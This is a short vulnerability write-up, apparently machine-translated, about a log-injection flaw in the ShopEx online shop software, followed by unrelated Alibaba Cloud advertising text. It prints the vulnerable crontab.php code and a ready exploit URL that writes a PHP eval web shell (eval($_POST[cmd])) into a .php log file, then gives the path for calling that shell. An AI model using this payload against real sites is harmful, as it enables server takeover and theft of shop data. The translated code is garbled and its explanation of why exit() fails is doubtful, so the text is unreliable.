ShopEx online shop system sales platform is one of the earliest online shop software providers in China. It is currently the most continuously developed company for online shop systems in China. It is the software provider with the highest share of online shop software in China; it is currently the largest company in the online shop software industry.
Vulnerability Description: The crontab. php variable is not strictly filtered. It is found that php exit () is not exited in linux and continues to be executed. The vulnerability is generated.
Vulnerability code:
Coreinclude_v5crontab.php after zend encryption, I only release the decrypted code.
Public function run ()
{
$ This-> logFile = HOME_DIR. "/logs/access. log. php ";
$ This-> now = time ();
$ This-> viewStat ();
$ Messenger = & $ this-> loadModel ("system/messenger ");
$ Messenger-> runQueue ();
}
Public function viewStat ()
{
If (! File_exists ($ this-> logFile ))
{
File_put_contents ($ this-> logFile, "# <? Php exit ()?> "); // What else! By: Xiao Xiang
}
If (isset ($ _ GET [action])
{
Error_log ($ this-> now. "". $ _ GET [action]. "". $ _ GET [p]. "", 3, $ this-> logFile); // No filtering,
Vulnerability exploitation:
I did not know the principle. I tested only a few sites and found that the linux exit () for php would not exit and continued to execute. The vulnerability is generated.
Directly submit: http: // 127.0.0.1/shopex /? Cron = 1 & action = 1 & p = 1 <? Php % 20 eval ($ _ POST [cmd])?>
In one sentence: http: // 127.0.0.1/shopex/home/logs/access. log. php
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
